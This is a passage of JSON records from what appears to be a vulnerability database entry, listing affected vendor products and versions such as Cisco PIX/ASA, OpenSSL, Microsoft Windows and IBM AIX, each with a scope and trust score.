{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.8"
},
{
"_id": null,
"model": "-release-p1",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.4"
},
{
"_id": null,
"model": "windows terminal services sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "jre beta",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5.0"
},
{
"_id": null,
"model": "ironport email security appliance c-series",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0.1"
},
{
"_id": null,
"model": "java sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.4.2"
},
{
"_id": null,
"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.(2.16)"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.6"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "7.1-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "sdk for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "pardus",
"version": "20090"
},
{
"_id": null,
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "11.2"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.6"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.04"
},
{
"_id": null,
"model": "windows vista enterprise sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "project proftpd rc3",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3"
},
{
"_id": null,
"model": "ucosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "cosminexus application server",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "5.0"
},
{
"_id": null,
"model": "message networking",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "thunderbird",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.0.2"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "rpath",
"version": "2"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.5"
},
{
"_id": null,
"model": "video surveillance media server software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.0"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "java se sr11",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "hp-ux b.11.23",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "6.4-release-p2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.1.10"
},
{
"_id": null,
"model": "one directory server patch",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.23"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.4.5"
},
{
"_id": null,
"model": "esx server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "4.1"
},
{
"_id": null,
"model": "secure gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "3.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4.18)"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "7.0"
},
{
"_id": null,
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.02"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.6"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.52"
},
{
"_id": null,
"model": "enterprise linux as extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "windows xp tablet pc edition",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "windows professional",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "secure gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "citrix",
"version": "3.1"
},
{
"_id": null,
"model": "java se sr11 pf1",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "network security services",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.12.2"
},
{
"_id": null,
"model": "meeting exchange",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10009.1.1"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.5"
},
{
"_id": null,
"model": "project proftpd",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3.1"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "76003.2(15)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.3.1"
},
{
"_id": null,
"model": "unified ip phone 7941g",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "project proftpd rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3.2"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)25"
},
{
"_id": null,
"model": "enterprise linux workstation optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "application \u0026 content networking software",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "5.5.17"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(0.98000.106)"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.6"
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.35"
},
{
"_id": null,
"model": "java system application server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.1"
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.4"
},
{
"_id": null,
"model": "ucosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "linux enterprise server sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2.8.7"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"_id": null,
"model": "linux enterprise desktop sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "linux enterprise server debuginfo",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.0.2"
},
{
"_id": null,
"model": "coat systems proxysg 200-c",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.1"
},
{
"_id": null,
"model": "opensolaris build snv 110",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.1"
},
{
"_id": null,
"model": "opensolaris build snv 71",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project openssl d",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "db2 universal database fix pack 6a",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "cosminexus studio standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "4"
},
{
"_id": null,
"model": "windows server itanium sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "windows server sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1.1.1"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1"
},
{
"_id": null,
"model": "windows server datacenter edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "ibm xl c/c++ enterprise edition for aix \u0026 hitachi developer\u0027s",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "v801-00"
},
{
"_id": null,
"model": "wireless control system software",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.96"
},
{
"_id": null,
"model": "ironport web security appliance s-series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "seamonkey",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "2.0.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1.(2.49)"
},
{
"_id": null,
"model": "identity management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.4.0.1"
},
{
"_id": null,
"model": "ons",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "15530"
},
{
"_id": null,
"model": "websphere datapower soa appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.1.12"
},
{
"_id": null,
"model": "openbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "openbsd",
"version": "4.5"
},
{
"_id": null,
"model": "unified contact center hosted icm7.1 es46",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)2"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "4.0"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.4.2"
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2"
},
{
"_id": null,
"model": "linux m68k",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "video surveillance media server software",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.1"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.1.1"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.11"
},
{
"_id": null,
"model": "aura communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "arubaos",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.4.1.0"
},
{
"_id": null,
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(3)"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1.1"
},
{
"_id": null,
"model": "project openssl f",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.8"
},
{
"_id": null,
"model": "java system web server sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "java system web server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.0"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "5.0"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "java system application server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.1"
},
{
"_id": null,
"model": "windows xp embedded sp3",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.60"
},
{
"_id": null,
"model": "windows vista ultimate 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "6.0-releng",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"_id": null,
"model": "linux mipsel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0"
},
{
"_id": null,
"model": "linux enterprise teradata sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.2"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.77"
},
{
"_id": null,
"model": "jdk 0 09",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "security agent for ipcc enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.616"
},
{
"_id": null,
"model": "opensolaris build snv 80",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "ucosminexus developer professional",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.0"
},
{
"_id": null,
"model": "communication manager sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.4"
},
{
"_id": null,
"model": "opensolaris build snv 104",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "11302.0"
},
{
"_id": null,
"model": "vcenter",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "4.1"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.4"
},
{
"_id": null,
"model": "network analysis module",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "windows xp professional",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2.1.6"
},
{
"_id": null,
"model": "software opera web browser beta",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.50"
},
{
"_id": null,
"model": "java system web proxy server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux server optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "unified contact center enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(5)"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.29"
},
{
"_id": null,
"model": "firefox",
"scope": "ne",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.9"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.1"
},
{
"_id": null,
"model": "windows home premium",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.3"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.4"
},
{
"_id": null,
"model": "blackberry enterprise server for novell groupwise",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.4"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"_id": null,
"model": "windows vista sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "application velocity system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3180"
},
{
"_id": null,
"model": "linux lts amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "linux enterprise java sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"_id": null,
"model": "application server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.3.5.0"
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.22"
},
{
"_id": null,
"model": "bigip application security manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "opensolaris build snv 84",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "etherfast befsr41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.05.00"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "11.0"
},
{
"_id": null,
"model": "project openssl m",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "windows xp media center edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "ibm xl c/c++ enterprise edition for aix \u0026 hitachi developer\u0027s",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "v701-00"
},
{
"_id": null,
"model": "windows starter",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(1)"
},
{
"_id": null,
"model": "openbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "openbsd",
"version": "4.6"
},
{
"_id": null,
"model": "java system application server enterprise edition q1",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "8.12005"
},
{
"_id": null,
"model": "3-dns",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.14"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.44"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(3)14"
},
{
"_id": null,
"model": "project openssl j",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "hp-ux",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.11"
},
{
"_id": null,
"model": "jdk 1.5.0.0 12",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows vista home basic sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "76004.0(9)"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.2.3"
},
{
"_id": null,
"model": "voice portal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "linux -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"_id": null,
"model": "pfsense 1.2-rc1",
"scope": null,
"trust": 0.3,
"vendor": "bsdperimeter",
"version": null
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.4"
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0"
},
{
"_id": null,
"model": "big-ip wan optimization module",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "jdk 1.6.0 01-b06",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "network analysis module patch",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "3.12"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.1.1"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.4.1"
},
{
"_id": null,
"model": "ace appliance a3",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4710"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.6"
},
{
"_id": null,
"model": "arubaos rn",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.1.1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1(2.5)"
},
{
"_id": null,
"model": "meeting exchange webportal",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "-6.0"
},
{
"_id": null,
"model": "unified ip phones",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "9.0.3"
},
{
"_id": null,
"model": "css11500 content services switch",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "software opera web browser beta",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.601"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2.(2.17)"
},
{
"_id": null,
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"_id": null,
"model": "java system web server sp11",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "http server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.47"
},
{
"_id": null,
"model": "jdk 1.5.0.0 03",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jboss enterprise web server el4",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "0"
},
{
"_id": null,
"model": "one directory server patch",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.24"
},
{
"_id": null,
"model": "windows vista ultimate sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "project openssl k",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "10.0"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.0"
},
{
"_id": null,
"model": "sdk for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "unified communications manager 7.0 su1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "windows for x64-based systems",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "70"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "10.1"
},
{
"_id": null,
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "novell linux pos",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "9"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2.10"
},
{
"_id": null,
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.27"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.10"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.0.3-1"
},
{
"_id": null,
"model": "windows professional sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.2(4.44)"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.5"
},
{
"_id": null,
"model": "solaris 10 x86",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.0"
},
{
"_id": null,
"model": "java system directory server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "windows vista enterprise sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.12"
},
{
"_id": null,
"model": "linux lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"_id": null,
"model": "windows xp professional sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "application networking manager update a",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(1.22)"
},
{
"_id": null,
"model": "ucosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "java system directory server 2004q2",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.0"
},
{
"_id": null,
"model": "wide area application services",
"scope": "ne",
"trust": 0.3,
